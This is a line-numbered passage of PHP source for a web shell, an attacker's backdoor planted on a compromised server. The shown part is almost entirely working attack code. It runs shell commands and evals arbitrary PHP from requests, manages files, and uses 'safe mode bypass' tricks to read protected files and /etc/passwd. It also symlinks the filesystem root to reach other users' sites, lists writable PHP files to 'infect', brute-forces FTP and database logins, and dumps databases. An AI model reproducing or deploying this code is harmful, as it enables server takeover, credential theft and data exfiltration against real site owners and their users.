664 echo '</select><input type=button onclick="add(document.cf.alias.value);if(document.cf.ajax.checked){a(null,null,document.cf.alias.value,document.cf.show_errors.checked?1:\'\');}else{g(null,null,document.cf.alias.value,document.cf.show_errors.checked?1:\'\');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 '.(@$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX <input type=checkbox name=show_errors value=1 '.(!empty($_POST['p2'])||$_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out']?'checked':'').'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>';
665 if(!empty($_POST['p1'])) {
666 echo htmlspecialchars("$ ".$_POST['p1']."\n".ex($_POST['p1']));
667 }
668 echo '</textarea><table style="border:1px solid #000;background-color:#000;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td style="padding-left:4px; width:13px;">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>';
669 echo '</form></div><script>document.cf.cmd.focus();</script>';
670 printFooter();
671}
672// Console end --------------------
673// PHP -----------------------
674function actionPhp() {
675 if( isset($_POST['ajax']) ) {
676 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
677 ob_start();
678 eval($_POST['p1']);
679 $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
680 echo strlen($temp), "\n", $temp;
681 exit;
682 }
683 printHeader();
684 if( isset($_POST['p2']) && ($_POST['p2'] == 'info') ) {
685 echo '<h1>PHP info</h1><div class=content>';
686 ob_start();
687 phpinfo();
688 $tmp = ob_get_clean();
689 $tmp = preg_replace('!body {.*}!msiU','',$tmp);
690 $tmp = preg_replace('!a:\w+ {.*}!msiU','',$tmp);
691 $tmp = preg_replace('!h1!msiU','h2',$tmp);
692 $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
693 $tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',$tmp);
694 echo $tmp;
695 echo '</div><br>';
696 }
697 if(empty($_POST['ajax'])&&!empty($_POST['p1']))
698 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
699 echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);}else{g(null,null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">';
700 echo ' <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
701 if(!empty($_POST['p1'])) {
702 ob_start();
703 eval($_POST['p1']);
704 echo htmlspecialchars(ob_get_clean());
705 }
706 echo '</pre></div>';
707 printFooter();
708}
709// PHP end --------------------
710// File manager go --------------------
711function actionFilesMan() {
712 printHeader();
713 echo '<h1>File manager</h1><div class=content>';
714 if(isset($_POST['p1'])) {
715 switch($_POST['p1']) {
716 case 'uploadFile':
717 if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']))
718 echo "Can't upload file!";
719 break;
720 break;
721 case 'mkdir':
722 if(!@mkdir($_POST['p2']))
723 echo "Can't create new dir";
724 break;
725 case 'delete':
726 function deleteDir($path) {
727 $path = (substr($path,-1)=='/') ? $path:$path.'/';
728 $dh = opendir($path);
729 while ( ($item = readdir($dh) ) !== false) {
730 $item = $path.$item;
731 if ( (basename($item) == "..") || (basename($item) == ".") )
732 continue;
733 $type = filetype($item);
734 if ($type == "dir")
735 deleteDir($item);
736 else
737 @unlink($item);
738 }
739 closedir($dh);
740 rmdir($path);
741 }
742 if(is_array(@$_POST['f']))
743 foreach($_POST['f'] as $f) {
744 $f = urldecode($f);
745 if(is_dir($f))
746 deleteDir($f);
747 else
748 @unlink($f);
749 }
750 break;
751 case 'paste':
752 if($_SESSION['act'] == 'copy') {
753 function copy_paste($c,$s,$d){
754 if(is_dir($c.$s)){
755 mkdir($d.$s);
756 $h = opendir($c.$s);
757 while (($f = readdir($h)) !== false)
758 if (($f != ".") and ($f != "..")) {
759 copy_paste($c.$s.'/',$f, $d.$s.'/');
760 }
761 } elseif(is_file($c.$s)) {
762 @copy($c.$s, $d.$s);
763 }
764 }
765 foreach($_SESSION['f'] as $f)
766 copy_paste($_SESSION['cwd'],$f, $GLOBALS['cwd']);
767 } elseif($_SESSION['act'] == 'move') {
768 function move_paste($c,$s,$d){
769 if(is_dir($c.$s)){
770 mkdir($d.$s);
771 $h = opendir($c.$s);
772 while (($f = readdir($h)) !== false)
773 if (($f != ".") and ($f != "..")) {
774 copy_paste($c.$s.'/',$f, $d.$s.'/');
775 }
776 } elseif(is_file($c.$s)) {
777 @copy($c.$s, $d.$s);
778 }
779 }
780 foreach($_SESSION['f'] as $f)
781 @rename($_SESSION['cwd'].$f, $GLOBALS['cwd'].$f);
782 }
783 unset($_SESSION['f']);
784 break;
785 default:
786 if(!empty($_POST['p1']) && (($_POST['p1'] == 'copy')||($_POST['p1'] == 'move')) ) {
787 $_SESSION['act'] = @$_POST['p1'];
788 $_SESSION['f'] = @$_POST['f'];
789 foreach($_SESSION['f'] as $k => $f)
790 $_SESSION['f'][$k] = urldecode($f);
791 $_SESSION['cwd'] = @$_POST['c'];
792 }
793 break;
794 }
795 echo '<script>document.mf.p1.value="";document.mf.p2.value="";</script>';
796 }
797 $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
798 if($dirContent === false) { echo 'Can\'t open this folder!'; return; }
799 global $sort;
800 $sort = array('name', 1);
801 if(!empty($_POST['p1'])) {
802 if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
803 $sort = array($match[1], (int)$match[2]);
804 }
805?>
806<script>
807 function sa() {
808 for(i=0;i<document.files.elements.length;i++)
809 if(document.files.elements[i].type == 'checkbox')
810 document.files.elements[i].checked = document.files.elements[0].checked;
811 }
812</script>
813<table width='100%' class='main' cellspacing='0' cellpadding='2'>
814<form name=files method=post>
815<?php
816 echo "<tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>";
817 $dirs = $files = $links = array();
818 $n = count($dirContent);
819 for($i=0;$i<$n;$i++) {
820 $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
821 $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
822 $tmp = array('name' => $dirContent[$i],
823 'path' => $GLOBALS['cwd'].$dirContent[$i],
824 'modify' => date('Y-m-d H:i:s',@filemtime($GLOBALS['cwd'].$dirContent[$i])),
825 'perms' => viewPermsColor($GLOBALS['cwd'].$dirContent[$i]),
826 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
827 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
828 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
829 );
830 if(@is_file($GLOBALS['cwd'].$dirContent[$i]))
831 $files[] = array_merge($tmp, array('type' => 'file'));
832 elseif(@is_link($GLOBALS['cwd'].$dirContent[$i]))
833 $links[] = array_merge($tmp, array('type' => 'link'));
834 elseif(@is_dir($GLOBALS['cwd'].$dirContent[$i])&& ($dirContent[$i] != "."))
835 $dirs[] = array_merge($tmp, array('type' => 'dir'));
836 }
837 $GLOBALS['sort'] = $sort;
838 function cmp($a, $b) {
839 if($GLOBALS['sort'][0] != 'size')
840 return strcmp($a[$GLOBALS['sort'][0]], $b[$GLOBALS['sort'][0]])*($GLOBALS['sort'][1]?1:-1);
841 else
842 return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
843 }
844 usort($files, "cmp");
845 usort($dirs, "cmp");
846 usort($links, "cmp");
847 $files = array_merge($dirs, $links, $files);
848 $l = 0;
849 foreach($files as $f) {
850 echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');"><b>[ '.htmlspecialchars($f['name']).' ]</b>').'</a></td><td>'.(($f['type']=='file')?viewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms']
851 .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>';
852 $l = $l?0:1;
853 }
854 ?>
855 <tr><td colspan=7>
856 <input type=hidden name=a value='FilesMan'>
857 <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'>
858 <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
859 <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option><?php if(!empty($_SESSION['act'])&&@count($_SESSION['f'])){?><option value='paste'>Paste</option><?php }?></select> <input type="submit" value=">>"></td></tr>
860 </form></table></div>
861 <?php
862 printFooter();
863}
864// File manager end --------------------
865// String tools go --------------------
866function actionStringTools() {
867 if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
868 if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}}
869 if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}
870 if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= sprintf('%02X',ord($p[$i]));return strtoupper($r);}}
871 if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
872 $stringTools = array(
873 'Base64 encode' => 'base64_encode',
874 'Base64 decode' => 'base64_decode',
875 'Url encode' => 'urlencode',
876 'Url decode' => 'urldecode',
877 'Full urlencode' => 'full_urlencode',
878 'md5 hash' => 'md5',
879 'sha1 hash' => 'sha1',
880 'crypt' => 'crypt',
881 'CRC32' => 'crc32',
882 'ASCII to HEX' => 'ascii2hex',
883 'HEX to ASCII' => 'hex2ascii',
884 'HEX to DEC' => 'hexdec',
885 'HEX to BIN' => 'hex2bin',
886 'DEC to HEX' => 'dechex',
887 'DEC to BIN' => 'decbin',
888 'BIN to HEX' => 'binhex',
889 'BIN to DEC' => 'bindec',
890 'String to lower case' => 'strtolower',
891 'String to upper case' => 'strtoupper',
892 'Htmlspecialchars' => 'htmlspecialchars',
893 'String length' => 'strlen',
894 );
895 if(isset($_POST['ajax'])) {
896 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
897 ob_start();
898 if(in_array($_POST['p1'], $stringTools))
899 echo $_POST['p1']($_POST['p2']);
900 $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
901 echo strlen($temp), "\n", $temp;
902 exit;
903 }
904 if(empty($_POST['ajax'])&&!empty($_POST['p1']))
905 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = 0;
906 printHeader();
907 echo '<h1>String conversions</h1><div class=content>';
908 echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
909 foreach($stringTools as $k => $v)
910 echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";
911 echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".(@$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".(empty($_POST['p1'])?'':htmlspecialchars(@$_POST['p2']))."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";
912 if(!empty($_POST['p1'])) {
913 if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2']));
914 }
915 echo"</pre></div><br><h1>Search files:</h1><div class=content>
916 <form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\"><table cellpadding='1' cellspacing='0' width='50%'>
917 <tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>
918 <tr><td>Path:</td><td><input type='text' name='cwd' value='". htmlspecialchars($GLOBALS['cwd']) ."' style='width:100%'></td></tr>
919 <tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>
920 <tr><td></td><td><input type='submit' value='>>'></td></tr>
921 </table></form>";
922 function printRecursiveGlob($path) {
923 if(substr($path, -1) != '/')
924 $path.='/';
925 $paths = @array_unique(@array_merge(@glob($path.$_POST['p3']), @glob($path.'*', GLOB_ONLYDIR)));
926 if(is_array($paths)&&@count($paths)) {
927 foreach($paths as $item) {
928 if(@is_dir($item)){
929 if($path!=$item)
930 printRecursiveGlob($item);
931 } else {
932 if(empty($_POST['p2']) || @strpos(file_get_contents($item), $_POST['p2'])!==false)
933 echo "<a href='#' onclick='g(\"FilesTools\",null,\"".urlencode($item)."\", \"view\",\"\")'>".htmlspecialchars($item)."</a><br>";
934 }
935 }
936 }
937 }
938 if(@$_POST['p3'])
939 printRecursiveGlob($_POST['c']);
940 echo "</div><br><h1>Search for hash:</h1><div class=content>
941 <form method='post' target='_blank' name='hf'>
942 <input type='text' name='hash' style='width:200px;'><br>
943 <input type='hidden' name='act' value='find'/>
944 <input type='button' value='hashcracking.ru' onclick=\"document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()\"><br>
945 <input type='button' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br>
946 <input type='button' value='fakenamegenerator.com' onclick=\"document.hf.action='http://www.fakenamegenerator.com/';document.hf.submit()\"><br>
947 <input type='button' value='hashcrack.com' onclick=\"document.hf.action='http://www.hashcrack.com/index.php';document.hf.submit()\"><br>
948 <input type='button' value='tools4noobs.com' onclick=\"document.hf.action='http://www.tools4noobs.com/online_php_functions/';document.hf.submit()\"><br>
949 <input type='button' value='md5decrypter.com' onclick=\"document.hf.action='http://www.md5decrypter.com/';document.hf.submit()\"><br>
950 <input type='button' value='artlebedev.ru' onclick=\"document.hf.action='https://www.artlebedev.ru/tools/decoder/';document.hf.submit()\"><br>
951 </form></div>";
952 printFooter();
953}
954// String tools end --------------------
955// Safe mode go ------------------------
956function actionSafeMode() {
957 $temp='';
958 ob_start();
959 switch($_POST['p1']) {
960 case 1:
961 $temp=@tempnam($test, 'cx');
962 if(@copy("compress.zlib://".$_POST['p2'], $temp)){
963 echo @file_get_contents($temp);
964 unlink($temp);
965 } else
966 echo 'Sorry... Can\'t open file';
967 break;
968 case 2:
969 $files = glob($_POST['p2'].'*');
970 if( is_array($files) )
971 foreach ($files as $filename)
972 echo $filename."\n";
973 break;
974 case 3:
975 $ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH);
976 curl_exec($ch);
977 break;
978 case 4:
979 ini_restore("safe_mode");
980 ini_restore("open_basedir");
981 include($_POST['p2']);
982 break;
983 case 5:
984 for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
985 $uid = @posix_getpwuid($_POST['p2']);
986 if ($uid)
987 echo join(':',$uid)."\n";
988 }
989 break;
990 case 6:
991 if(!function_exists('imap_open'))break;
992 $stream = imap_open($_POST['p2'], "", "");
993 if ($stream == FALSE)
994 break;
995 echo imap_body($stream, 1);
996 imap_close($stream);
997 break;
998 }
999 $temp = ob_get_clean();
1000 printHeader();
1001 echo '<h1>Safe mode bypass</h1><div class=content>';
1002 echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form><br><br><span>Imap_open (read file)</span><form onsubmit=\'g(null,null,"6",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form>';
1003 if($temp)
1004 echo '<pre class="ml1" style="margin-top:5px" id="Output">'.$temp.'</pre>';
1005 echo '</div>';
1006 printFooter();
1007}
1008// Safe mode end ---------------------
1009// Logout go -------------------------
1010function actionLogout() {
1011 unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
1012 echo 'bye!';
1013}
1014// Logout end -------------------------
1015// Suicide go -------------------------
1016function actionSelfRemove() {
1017 printHeader();
1018 if($_POST['p1'] == 'yes') {
1019 if(@unlink(SELF_PATH))
1020 die('Shell has been removed');
1021 else
1022 echo 'unlink error!';
1023 }
1024 echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
1025 printFooter();
1026}
1027// Suicide end -------------------------
1028function actionTools() {
1029 printHeader();
1030
1031 printFooter();
1032}
1033// Domains go -------------------------
1034function actionDomains() {
1035 printHeader();
1036 error_reporting(0);
1037echo "<title>#Domains & Users</title>";
1038mkdir("sym");
1039symlink("/","0/x.txt");
1040$c = "Options Indexes FollowSymLinks \n DirectoryIndex ssssss.htm \n AddType txt .php \n AddHandler txt .php \n AddType txt .html \n AddHandler txt .html \n Options all \n Options \n Allow from all \n Require None \n Satisfy Any";
1041$f = fopen ('sym/.htaccess','w');
1042 fwrite($f , $c);
1043
1044$d0mains = @file("/etc/named.conf");
1045if(!$d0mains){ die("<b>#Error... -> [ /etc/named.conf ]"); }
1046echo "<table align=center border=1>
1047<tr bgcolor=teal><td>Domain</td><td>User List </td><td>Symlink</td></tr>";
1048foreach($d0mains as $d0main){
1049if(eregi("zone",$d0main)){
1050preg_match_all('#zone "(.*)"#', $d0main, $domains);
1051flush();
1052if(strlen(trim($domains[1][0])) > 2){
1053$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
1054echo "<tr><td><a href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a></td><td>".$user['name']."</td><td><a href='sym/x.txt/home/".$user['name']."/public_html'>Miremos</a></td></tr>"; flush();
1055}}}
1056echo "</table>
1057<p align='center'>
1058FailRoot'Cod3rz <a href='http://failroot.wordpress.com/'>FailRoot-Sec.Com</a> | <a
1059href='http://wWw.sEc4EvEr.CoM/'>wWw.sEc4EvEr.CoM</a><br>
1060</p>
1061";
1062 printFooter();
1063}
1064// Domains end -----------------------
1065// Infect go -------------------------
1066function actionInfect() {
1067 printHeader();
1068 echo '<h1>Infect</h1><div class=content>';
1069 if($_POST['p1'] == 'infect') {
1070 $target=$_SERVER['DOCUMENT_ROOT'];
1071 function ListFiles($dir) {
1072 if($dh = opendir($dir)) {
1073 $files = Array();
1074 $inner_files = Array();
1075 while($file = readdir($dh)) {
1076 if($file != "." && $file != "..") {
1077 if(is_dir($dir . "/" . $file)) {
1078 $inner_files = ListFiles($dir . "/" . $file);
1079 if(is_array($inner_files)) $files = array_merge($files, $inner_files);
1080 } else {
1081 array_push($files, $dir . "/" . $file);
1082 }
1083 }
1084 }
1085 closedir($dh);
1086 return $files;
1087 }
1088 }
1089 foreach (ListFiles($target) as $key=>$file){
1090 $nFile = substr($file, -4, 4);
1091 if($nFile == ".php" ){
1092 if(($file<>$_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF'])&&(is_writeable($file))){
1093 echo "$file<br>";
1094 $i++;
1095 }
1096 }
1097 }
1098 echo "<font color=red size=14>$i</font>";
1099 }else{
1100 echo "<form method=post><input type=submit value=Infect name=infet></form>";
1101 echo 'Really want to infect the server? <a href=# onclick="g(null,null,\'infect\')">Yes</a></div>';
1102 }
1103 printFooter();
1104}
1105// Infect end -----------------------
1106// Bruteforce go --------------------
1107function actionBruteforce() {
1108 printHeader();
1109 if( isset($_POST['proto']) ) {
1110 echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>';
1111 if( $_POST['proto'] == 'ftp' ) {
1112 function bruteForce($ip,$port,$login,$pass) {
1113 $fp = @ftp_connect($ip, $port?$port:21);
1114 if(!$fp) return false;
1115 $res = @ftp_login($fp, $login, $pass);
1116 @ftp_close($fp);
1117 return $res;
1118 }
1119 } elseif( $_POST['proto'] == 'mysql' ) {
1120 function bruteForce($ip,$port,$login,$pass) {
1121 $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass);
1122 @mysql_close($res);
1123 return $res;
1124 }
1125 } elseif( $_POST['proto'] == 'pgsql' ) {
1126 function bruteForce($ip,$port,$login,$pass) {
1127 $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=''";
1128 $res = @pg_connect($server[0].':'.$server[1]?$server[1]:5432, $login, $pass);
1129 @pg_close($res);
1130 return $res;
1131 }
1132 }
1133 $success = 0;
1134 $attempts = 0;
1135 $server = explode(":", $_POST['server']);
1136 if($_POST['type'] == 1) {
1137 $temp = @file('/etc/passwd');
1138 if( is_array($temp) )
1139 foreach($temp as $line) {
1140 $line = explode(":", $line);
1141 ++$attempts;
1142 if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {
1143 $success++;
1144 echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
1145 }
1146 if(@$_POST['reverse']) {
1147 $tmp = "";
1148 for($i=strlen($line[0])-1; $i>=0; --$i)
1149 $tmp .= $line[0][$i];
1150 ++$attempts;
1151 if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {
1152 $success++;
1153 echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
1154 }
1155 }
1156 }
1157 } elseif($_POST['type'] == 2) {
1158 $temp = @file($_POST['dict']);
1159 if( is_array($temp) )
1160 foreach($temp as $line) {
1161 $line = trim($line);
1162 ++$attempts;
1163 if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) {
1164 $success++;
1165 echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>';
1166 }
1167 }
1168 }
1169 echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
1170 }
1171 echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>'
1172 .'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>'
1173 .'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">'
1174 .'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">'
1175 .'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">'
1176 .'<span>Server:port</span></td>'
1177 .'<td><input type=text name=server value="127.0.0.1"></td></tr>'
1178 .'<tr><td><span>Brute type</span></td>'
1179 .'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>'
1180 .'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>'
1181 .'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>'
1182 .'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>'
1183 .'<td><input type=text name=login value="root"></td></tr>'
1184 .'<tr><td><span>Dictionary</span></td>'
1185 .'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>'
1186 .'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>';
1187 echo '</div><br>';
1188 printFooter();
1189}
1190// Bruteforce end --------------------
1191// Sql go ----------------------------
1192function actionSql() {
1193 class DbClass {
1194 var $type;
1195 var $link;
1196 var $res;
1197 function DbClass($type) {
1198 $this->type = $type;
1199 }
1200 function connect($host, $user, $pass, $dbname){
1201 switch($this->type) {
1202 case 'mysql':
1203 if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;
1204 break;
1205 case 'pgsql':
1206 $host = explode(':', $host);
1207 if(!$host[1]) $host[1]=5432;
1208 if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
1209 break;
1210 }
1211 return false;
1212 }
1213 function selectdb($db) {
1214 switch($this->type) {
1215 case 'mysql':
1216 if (@mysql_select_db($db))return true;
1217 break;
1218 }
1219 return false;
1220 }
1221 function query($str) {
1222 switch($this->type) {
1223 case 'mysql':
1224 return $this->res = @mysql_query($str);
1225 break;
1226 case 'pgsql':
1227 return $this->res = @pg_query($this->link,$str);
1228 break;
1229 }
1230 return false;
1231 }
1232 function fetch() {
1233 $res = func_num_args()?func_get_arg(0):$this->res;
1234 switch($this->type) {
1235 case 'mysql':
1236 return @mysql_fetch_assoc($res);
1237 break;
1238 case 'pgsql':
1239 return @pg_fetch_assoc($res);
1240 break;
1241 }
1242 return false;
1243 }
1244 function listDbs() {
1245 switch($this->type) {
1246 case 'mysql':
1247 return $this->res = @mysql_list_dbs($this->link);
1248 break;
1249 case 'pgsql':
1250 return $this->res = $this->query("SELECT datname FROM pg_database");
1251 break;
1252 }
1253 return false;
1254 }
1255 function listTables() {
1256 switch($this->type) {
1257 case 'mysql':
1258 return $this->res = $this->query('SHOW TABLES');
1259 break;
1260 case 'pgsql':
1261 return $this->res = $this->query("select table_name from information_schema.tables where (table_schema != 'information_schema' AND table_schema != 'pg_catalog') or table_name = 'pg_user'");
1262 break;
1263 }
1264 return false;
1265 }
1266 function error() {
1267 switch($this->type) {
1268 case 'mysql':
1269 return @mysql_error($this->link);
1270 break;
1271 case 'pgsql':
1272 return @pg_last_error($this->link);
1273 break;
1274 }
1275 return false;
1276 }
1277 function setCharset($str) {
1278 switch($this->type) {
1279 case 'mysql':
1280 if(function_exists('mysql_set_charset'))
1281 return @mysql_set_charset($str, $this->link);
1282 else
1283 $this->query('SET CHARSET '.$str);
1284 break;
1285 case 'mysql':
1286 return @pg_set_client_encoding($this->link, $str);
1287 break;
1288 }
1289 return false;
1290 }
1291 function dump($table) {
1292 switch($this->type) {
1293 case 'mysql':
1294 $res = $this->query('SHOW CREATE TABLE `'.$table.'`');
1295 $create = mysql_fetch_array($res);
1296 echo $create[1].";\n\n";
1297 $this->query('SELECT * FROM `'.$table.'`');
1298 while($item = $this->fetch()) {
1299 $columns = array();
1300 foreach($item as $k=>$v) {
1301 $item[$k] = "'".@mysql_real_escape_string($v)."'";
1302 $columns[] = "`".$k."`";
1303 }
1304 echo 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
1305 }
1306 break;
1307 case 'pgsql':
1308 $this->query('SELECT * FROM '.$table);
1309 while($item = $this->fetch()) {
1310 $columns = array();
1311 foreach($item as $k=>$v) {
1312 $item[$k] = "'".addslashes($v)."'";
1313 $columns[] = $k;
1314 }
1315 echo 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
1316 }
1317 break;
1318 }
1319 return false;
1320 }
1321 };
1322 $db = new DbClass($_POST['type']);
1323 if(@$_POST['p2']=='download') {
1324 ob_start("ob_gzhandler", 4096);
1325 $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
1326 $db->selectdb($_POST['sql_base']);
1327 header("Content-Disposition: attachment; filename=dump.sql");
1328 header("Content-Type: text/plain");
1329 foreach($_POST['tbl'] as $v)
1330 $db->dump($v);
1331 exit;
1332 }
1333 printHeader();
1334 ?>
1335 <h1>Sql browser</h1><div class=content>
1336 <form name="sf" method="post">
1337 <table cellpadding="2" cellspacing="0">
1338 <tr>
1339 <td>Type</td>
1340 <td>Host</td>
1341 <td>Login</td>
1342 <td>Password</td>
1343 <td>Database</td>
1344 <td></td>
1345 </tr>
1346 <tr>
1347 <input type=hidden name=a value=Sql>
1348 <input type=hidden name=p1 value='query'>
